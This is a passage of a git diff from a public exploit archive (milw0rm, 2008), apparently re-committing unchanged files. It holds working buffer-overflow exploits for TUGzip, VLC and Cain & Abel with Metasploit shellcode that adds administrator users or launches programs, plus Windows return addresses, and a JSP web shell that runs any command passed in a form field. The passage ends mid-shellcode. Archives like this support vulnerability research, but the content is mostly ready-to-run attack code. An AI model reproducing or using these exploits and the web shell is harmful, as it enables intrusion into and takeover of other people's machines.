+"\x45\x43\x55\x4F\x4F\x48\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61" +"\x82\xFD\x81\x98\x98\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" 
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x2E\x74\x78\x74\x50\x4B\x05\x06\x00\x00\x00\x00" +"\x01\x00\x01\x00\x42\x08\x00\x00\x32\x08\x00\x00"; + + + char shellcode_1[]= + // Skylined's alpha2 unicode decoder + //Un-encoded ADD USER shellcode + "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABA" + "BABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB" + // Encoded opcodes + "ylzHOTM0KPkP2kQ5OL2kQlKUt8kQzOtK0On82k1OO0KQ8kpIDKoDTKKQXnnQ7P4Y4lU4upptm7i1WZLM" + "kQWRJKJTMkpTLdzdt59UdKooktkQzKOv4KlLNkDKooMLyqZKBkMLRkzajKQyQLmTM45sNQUpotRkmplp" + 
"tEupQhlLBkoPlLRkRPKlvMRkoxjhzKKYtKqpFPkPm0KPbkphMlaOlqhvqPPVriJXCS5pCKNpOxJO8Nk0"
+ "C0c8eHKNqzznPW9oyW1SBMotnNaUQhaUkpNOpckpRNOuqdmPRUpsqUPrmP%skp%s"
+ "mPnOQ1OTNdo0mVMVMPpnOurTMP0lBOqS31PlC7prpobU0pkpoQotPmoyPn1YT3ptT2aQPtpo1bBSkp%s"
+ "MPNOOQa4oTkPA";
+ //ADD USER shellcode TNX to metasploit
+ char shellcode_2[]=
+ "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
+ "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
+ "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
+ "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
+ "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
+ "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
+ "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
+ "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
+ "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
+ "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
+ "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
+ "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
+ "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
+ "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
+ "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
+ "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
+ "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
+ "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
+ "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
+ "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
+ "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
+ "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
+
+ struct addresses
+ { char *platform;
+ unsigned long addr;
+ }
+ targets[]=
+ {
+
+ { "[*]Microsoft Windows XP 5.1.1.0 SP1 (IA32)English(jmp esp)",0x778eadcf },
+ { "[*]Microsoft Windows 
Pro sp3 English (call esp)",0x7C8369F0 },
+ { "[*]Microsoft Windows Pro sp3 English (jmp esp)",0x7C86467B },
+ { "[*]Windows XP 5.1.2.0 SP2 (IA32) English (jmp esp)",0x7d184de7 },
+ { "[*]Windows XP 5.1.2.0 SP2 (IA32) German (jmp esp)",0x77d85197 },
+ { "[*]Windows 2000 5.0.1.0 SP1 (IA32) English (jmp esp)",0x69952208 },
+ { "[*]Crash the program",0x58585858 },
+ {NULL }
+ };
+
+ int main(int argc,char *argv[])
+ { FILE *h;
+ char *buffer;
+ buffer=(char *)malloc(sizeof(file_1)+sizeof(file_2));
+ unsigned int offset=0;
+ int number;
+ unsigned int retaddress=targets[atoi(argv[2])].addr;
+ if(argc<2)
+ { printf("# \tChose your Platform #\n");
+ for(int i=0;targets[i].platform;i++)
+ printf("%d \t\t %s\n",i,targets[i].platform);
+ printf("\tUsage is:\n");
+ printf(argv[0]);
+ printf(".exe ");
+ printf("filename.zip ");
+ printf("platform\n");
+ printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n");
+
+ system("color 02");
+ Sleep(2000);
+ return 0;
+ }
+
+ if((h=fopen(argv[1],"wb"))==NULL)
+ { printf("error\n");
+ exit(0);
+ }
+
+ memcpy(buffer,file_1,sizeof(file_1)); offset=sizeof(file_1);
+ memcpy(buffer+offset-1,file_2,sizeof(file_2)); offset=OFFSET;
+ memcpy(buffer+offset,&retaddress,4); offset=0; offset=NOP;
+ memset(buffer+offset,0x90,20);
+
+ printf("#___________________________________________________________________________#\n");
+ printf("Now chose your shellcode \n");
+ printf("Press [1] for Alphanumeric shellcode\n");
+ printf("Press [2] for NonAphanumeric shellcode\n");
+ printf("#___________________________________________________________________________#\n");
+
+ scanf("%d",&number);
+ switch(number)
+ { case 1:
+ offset=shellcode_offset;
+ memcpy(buffer+offset,shellcode_1,sizeof(shellcode_1));
+ case 2:
+ offset=shellcode_offset;
+ memcpy(buffer+offset,shellcode_2,sizeof(shellcode_2));
+ }
+ fwrite(buffer,1,sizeof(file_1)+sizeof(file_2),h);
+ printf("Building file ...\n");
+ printf("Done ! 
Open with TUGzip and see what happens :) \n");
+ printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n");
+ fclose(h);
+ free(buffer);
+return 0;
+ }
+
+// milw0rm.com [2008-10-24]
diff --git a/platforms/windows/local/7051.pl b/platforms/windows/local/7051.pl
index 4696233c3..5945af2a9 100755
--- a/platforms/windows/local/7051.pl
+++ b/platforms/windows/local/7051.pl
@@ -1,75 +1,75 @@ -#!/usr/bin/perl -# VLC Media Player < 0.9.6 .RT File Buffer Overflow (Stack Based) -# --------------------------------------------------------------- -# Exploit by SkD -# -# This should work on a fully up-to-date Windows XP SP3. If you want it to work -# on your OS version, just find a "jmp esp" address in one of the dlls loaded -# with VLC :). -# Have fun. Remember that VLC will open the file .rt automatically with a video -# of the same name (example: s.mov with s.rt in the same folder). -# Credits to Tobias Klein. -# Author has no responsibility over the damage you do with this! - -use strict; use warnings; -# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com -my $shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49". -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41". -"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32". -"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d". -"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c". -"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45". -"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36". -"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e". -"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a". -"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d". -"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74". -"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57". -"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38". -"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b". -"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77". -"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b". -"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53". -"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f". 
-"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31". -"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50". -"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37". -"\x70\x41"; -my $char = "\x41"; -my $nop = "\x90"; -my $eip = "\xd7\x30\x9d\x7c"; # FOR WINDOWS XP SP3: 0x7c9d30d7 jmp esp (shell32.dll) -my $jmp = "\xeb\x06\xFF\xFF"; -my $addr = "\xb5\xb5\xfd\x7f"; -open(my $rt, "> s.rt"); -print $rt "\x3C\x77\x69\x6E\x64\x6F\x77\x20\x68\x65". - "\x69\x67\x68\x74\x3D\x22\x32\x35\x30\x22". - "\x20\x77\x69\x64\x74\x68\x3D\x22\x33\x30". - "\x30\x22\x20\x64\x75\x72\x61\x74\x69\x6F". - "\x6E\x3D\x22\x31\x35\x22\x20\x62\x67\x63". - "\x6F\x6C\x6F\x72\x3D\x22\x79\x65\x6C\x6C". - "\x6F\x77\x22\x3E\x0D\x0A\x4D\x61\x72\x79". - "\x20\x68\x61\x64\x20\x61\x20\x6C\x69\x74". - "\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D". - "\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D". - "\x65\x20\x62\x65\x67\x69\x6E\x3D\x22". - $char x 72 . $eip . $jmp . $addr . $nop x 12 . - $shellcode . $char x 1024 . - "\x22\x2F\x3E\x0D\x0A\x3C\x62\x72\x2F\x3E". - "\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69". - "\x6E\x3D\x22\x36\x22\x2F\x3E\x6C\x69\x74". - "\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D". - "\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D". - "\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x39". - "\x22\x2F\x3E\x4D\x61\x72\x79\x20\x68\x61". - "\x64\x20\x61\x20\x6C\x69\x74\x74\x6C\x65". - "\x20\x6C\x61\x6D\x62\x0D\x0A\x3C\x62\x72". - "\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65". - "\x67\x69\x6E\x3D\x22\x31\x32\x22\x2F\x3E". - "\x77\x68\x6F\x73\x65\x20\x66\x6C\x65\x65". - "\x63\x65\x20\x77\x61\x73\x20\x77\x68\x69". - "\x74\x65\x20\x61\x73\x20\x73\x6E\x6F\x77". - "\x2E\x0D\x0A\x3C\x2F\x77\x69\x6E\x64\x6F". - "\x77\x3E\x0D\x0A"; - -# milw0rm.com [2008-11-07] +#!/usr/bin/perl +# VLC Media Player < 0.9.6 .RT File Buffer Overflow (Stack Based) +# --------------------------------------------------------------- +# Exploit by SkD +# +# This should work on a fully up-to-date Windows XP SP3. 
If you want it to work +# on your OS version, just find a "jmp esp" address in one of the dlls loaded +# with VLC :). +# Have fun. Remember that VLC will open the file .rt automatically with a video +# of the same name (example: s.mov with s.rt in the same folder). +# Credits to Tobias Klein. +# Author has no responsibility over the damage you do with this! + +use strict; use warnings; +# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com +my $shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49". +"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41". +"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32". +"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d". +"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c". +"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45". +"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36". +"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e". +"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a". +"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d". +"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74". +"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57". +"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38". +"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b". +"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77". +"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b". +"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53". +"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f". +"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31". +"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50". +"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37". 
+"\x70\x41";
+my $char = "\x41";
+my $nop = "\x90";
+my $eip = "\xd7\x30\x9d\x7c"; # FOR WINDOWS XP SP3: 0x7c9d30d7 jmp esp (shell32.dll)
+my $jmp = "\xeb\x06\xFF\xFF";
+my $addr = "\xb5\xb5\xfd\x7f";
+open(my $rt, "> s.rt");
+print $rt "\x3C\x77\x69\x6E\x64\x6F\x77\x20\x68\x65".
+ "\x69\x67\x68\x74\x3D\x22\x32\x35\x30\x22".
+ "\x20\x77\x69\x64\x74\x68\x3D\x22\x33\x30".
+ "\x30\x22\x20\x64\x75\x72\x61\x74\x69\x6F".
+ "\x6E\x3D\x22\x31\x35\x22\x20\x62\x67\x63".
+ "\x6F\x6C\x6F\x72\x3D\x22\x79\x65\x6C\x6C".
+ "\x6F\x77\x22\x3E\x0D\x0A\x4D\x61\x72\x79".
+ "\x20\x68\x61\x64\x20\x61\x20\x6C\x69\x74".
+ "\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D".
+ "\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D".
+ "\x65\x20\x62\x65\x67\x69\x6E\x3D\x22".
+ $char x 72 . $eip . $jmp . $addr . $nop x 12 .
+ $shellcode . $char x 1024 .
+ "\x22\x2F\x3E\x0D\x0A\x3C\x62\x72\x2F\x3E".
+ "\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69".
+ "\x6E\x3D\x22\x36\x22\x2F\x3E\x6C\x69\x74".
+ "\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D".
+ "\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D".
+ "\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x39".
+ "\x22\x2F\x3E\x4D\x61\x72\x79\x20\x68\x61".
+ "\x64\x20\x61\x20\x6C\x69\x74\x74\x6C\x65".
+ "\x20\x6C\x61\x6D\x62\x0D\x0A\x3C\x62\x72".
+ "\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65".
+ "\x67\x69\x6E\x3D\x22\x31\x32\x22\x2F\x3E".
+ "\x77\x68\x6F\x73\x65\x20\x66\x6C\x65\x65".
+ "\x63\x65\x20\x77\x61\x73\x20\x77\x68\x69".
+ "\x74\x65\x20\x61\x73\x20\x73\x6E\x6F\x77".
+ "\x2E\x0D\x0A\x3C\x2F\x77\x69\x6E\x64\x6F".
+ "\x77\x3E\x0D\x0A";
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/windows/local/7135.htm b/platforms/windows/local/7135.htm
index 029a5b1a6..26de0ba34 100755
--- a/platforms/windows/local/7135.htm
+++ b/platforms/windows/local/7135.htm
@@ -1,41 +1,41 @@
-
-uh?
-
-
-
-
-
-
-# milw0rm.com [2008-11-17]
+
+uh?
+
+
+
+
+
+
+# milw0rm.com [2008-11-17]
diff --git a/platforms/windows/local/7264.txt b/platforms/windows/local/7264.txt
index e636503a3..0e503a305 100755
--- a/platforms/windows/local/7264.txt
+++ b/platforms/windows/local/7264.txt
@@ -1,40 +1,40 @@
-<%@ page import="java.util.*,java.io.*"%>
-<%
-%>
-
-<%--
-abysssec inc public material
-
-just upload this file with abysssec.jsp and execute your command
-your command will run as administrator . you can download sam file
-add user or do anything you want .
-note : please be gentle and don't obstructionism .
-vulnerability discovered by : abysssec.com
-
- --%>
-
- Abysssec inc (abysssec.com) JSP vulnerability </tile>
-<center><h3>JSP Privilege Escalation Vulnerability PoC</center></h3>
-<FORM METHOD="GET" NAME="myform" ACTION="">
-<INPUT TYPE="text" NAME="cmd">
-<INPUT TYPE="submit" VALUE="Execute !">
-</FORM>
-<pre>
-<%
-if (request.getParameter("cmd") != null) {
- out.println("Command: " + request.getParameter("cmd") + "<BR>");
- Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
- OutputStream os = p.getOutputStream();
- InputStream in = p.getInputStream();
- DataInputStream dis = new DataInputStream(in);
- String disr = dis.readLine();
- while ( disr != null ) {
- out.println(disr);
- disr = dis.readLine();
- }
- }
-%>
-</pre>
-</BODY></HTML>
-
-# milw0rm.com [2008-11-28]
+<%@ page import="java.util.*,java.io.*"%>
+<%
+%>
+
+<%--
+abysssec inc public material
+
+just upload this file with abysssec.jsp and execute your command
+your command will run as administrator . you can download sam file
+add user or do anything you want .
+note : please be gentle and don't obstructionism . 
+vulnerability discovered by : abysssec.com
+
+ --%>
+<HTML><BODY bgcolor=#0000000 and text=#DO0000>
+<title> Abysssec inc (abysssec.com) JSP vulnerability </tile>
+<center><h3>JSP Privilege Escalation Vulnerability PoC</center></h3>
+<FORM METHOD="GET" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Execute !">
+</FORM>
+<pre>
+<%
+if (request.getParameter("cmd") != null) {
+ out.println("Command: " + request.getParameter("cmd") + "<BR>");
+ Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+ OutputStream os = p.getOutputStream();
+ InputStream in = p.getInputStream();
+ DataInputStream dis = new DataInputStream(in);
+ String disr = dis.readLine();
+ while ( disr != null ) {
+ out.println(disr);
+ disr = dis.readLine();
+ }
+ }
+%>
+</pre>
+</BODY></HTML>
+
+# milw0rm.com [2008-11-28]
diff --git a/platforms/windows/local/7329.py b/platforms/windows/local/7329.py
index a76c68b1f..0cab8d5e4 100755
--- a/platforms/windows/local/7329.py
+++ b/platforms/windows/local/7329.py
@@ -1,58 +1,58 @@
-#exploit.py
-print ""
-print " !R4Q!4N H4CK3R"
-print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
-print "By:Encrypt3d.M!nd"
-print "encrypt3d.blogspot.com"
-print "######################################################"
-print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
-print "This is exploit for my PoC"
-print "Tested on:Windows Xp Sp3 Patched"
-print "This exploit will Create File(.rdp) and when decoding"
-print "The file with Cain(Remote Desktop Password Decoder)"
-print "Will Add administrator user(user) with password(pass)"
-print ""
-
-# win32_adduser - PASS=pass EXITFUNC=seh USER=user Size=232
-Encoder=PexFnstenvSub http://metasploit.com
-
-shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46"
-shellcode+= "\xcd\x10\x60\x83\xeb\xfc\xe2\xf4\xba\x25\x54\x60\x46\xcd\x9b\x25"
-shellcode+= "\x7a\x46\x6c\x65\x3e\xcc\xff\xeb\x09\xd5\x9b\x3f\x66\xcc\xfb\x29"
-shellcode+= "\xcd\xf9\x9b\x61\xa8\xfc\xd0\xf9\xea\x49\xd0\x14\x41\x0c\xda\x6d"
-shellcode+= "\x47\x0f\xfb\x94\x7d\x99\x34\x64\x33\x28\x9b\x3f\x62\xcc\xfb\x06"
-shellcode+= "\xcd\xc1\x5b\xeb\x19\xd1\x11\x8b\xcd\xd1\x9b\x61\xad\x44\x4c\x44"
-shellcode+= "\x42\x0e\x21\xa0\x22\x46\x50\x50\xc3\x0d\x68\x6c\xcd\x8d\x1c\xeb"
-shellcode+= "\x36\xd1\xbd\xeb\x2e\xc5\xfb\x69\xcd\x4d\xa0\x60\x46\xcd\x9b\x08"
-shellcode+= "\x7a\x92\x21\x96\x26\x9b\x99\x98\xc5\x0d\x6b\x30\x2e\x3d\x9a\x64"
-shellcode+= "\x19\xa5\x88\x9e\xcc\xc3\x47\x9f\xa1\xae\x7d\x04\x68\xa8\x68\x05"
-shellcode+= "\x66\xe2\x73\x40\x28\xa8\x64\x40\x33\xbe\x75\x12\x66\xb8\x63\x05"
-shellcode+= "\x34\xed\x60\x01\x35\xbe\x30\x4f\x07\x89\x54\x40\x60\xeb\x30\x0e"
-shellcode+= "\x23\xb9\x30\x0c\x29\xae\x71\x0c\x21\xbf\x7f\x15\x36\xed\x51\x04"
-shellcode+= "\x2b\xa4\x7e\x09\x35\xb9\x62\x01\x32\xa2\x62\x13\x66\xb8\x63\x05"
-shellcode+= "\x34\xed\x3f\x21\x02\x89\x10\x60";
-
-# and if you want to test it..this shellcode will open calc.exe
-#shellcode = 
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
-#shellcode+= "\xab\x63\x3d\x83\xeb\xfc\xe2\xf4\x4e\x43\x27\x3d\xb2\xab\xe8\x78"
-#shellcode+= "\x8e\x20\x1f\x38\xca\xaa\x8c\xb6\xfd\xb3\xe8\x62\x92\xaa\x88\x74"
-#shellcode+= "\x39\x9f\xe8\x3c\x5c\x9a\xa3\xa4\x1e\x2f\xa3\x49\xb5\x6a\xa9\x30"
-#shellcode+= "\xb3\x69\x88\xc9\x89\xff\x47\x39\xc7\x4e\xe8\x62\x96\xaa\x88\x5b"
-#shellcode+= "\x39\xa7\x28\xb6\xed\xb7\x62\xd6\x39\xb7\xe8\x3c\x59\x22\x3f\x19"
-#shellcode+= "\xb6\x68\x52\xfd\xd6\x20\x23\x0d\x37\x6b\x1b\x31\x39\xeb\x6f\xb6"
-#shellcode+= "\xc2\xb7\xce\xb6\xda\xa3\x88\x34\x39\x2b\xd3\x3d\xb2\xab\xe8\x55"
-#shellcode+= "\x8e\xf4\x52\xcb\xd2\xfd\xea\xc5\x31\x6b\x18\x6d\xda\x5b\xe9\x39"
-#shellcode+= "\xed\xc3\xfb\xc3\x38\xa5\x34\xc2\x55\xc8\x02\x51\xd1\x85\x06\x45"
-#shellcode+= "\xd7\xab\x63\x3d";
-
-eip = "\xB7\x2F\x49\x7E" #user32.dll jmp esp 0x7E492FB7
-
-chars = "E"*8206
-print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"
-print ""
-file = open('cain.rdp','w')
-file.write (chars+eip+eip+"\x90"*10+shellcode)
-file.close()
-print "D0NE!" 
-
-# milw0rm.com [2008-12-03]
+#exploit.py
+print ""
+print " !R4Q!4N H4CK3R"
+print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
+print "By:Encrypt3d.M!nd"
+print "encrypt3d.blogspot.com"
+print "######################################################"
+print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
+print "This is exploit for my PoC"
+print "Tested on:Windows Xp Sp3 Patched"
+print "This exploit will Create File(.rdp) and when decoding"
+print "The file with Cain(Remote Desktop Password Decoder)"
+print "Will Add administrator user(user) with password(pass)"
+print ""
+
+# win32_adduser - PASS=pass EXITFUNC=seh USER=user Size=232
+Encoder=PexFnstenvSub http://metasploit.com
+
+shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46"
+shellcode+= "\xcd\x10\x60\x83\xeb\xfc\xe2\xf4\xba\x25\x54\x60\x46\xcd\x9b\x25"
+shellcode+= "\x7a\x46\x6c\x65\x3e\xcc\xff\xeb\x09\xd5\x9b\x3f\x66\xcc\xfb\x29"
+shellcode+= "\xcd\xf9\x9b\x61\xa8\xfc\xd0\xf9\xea\x49\xd0\x14\x41\x0c\xda\x6d"
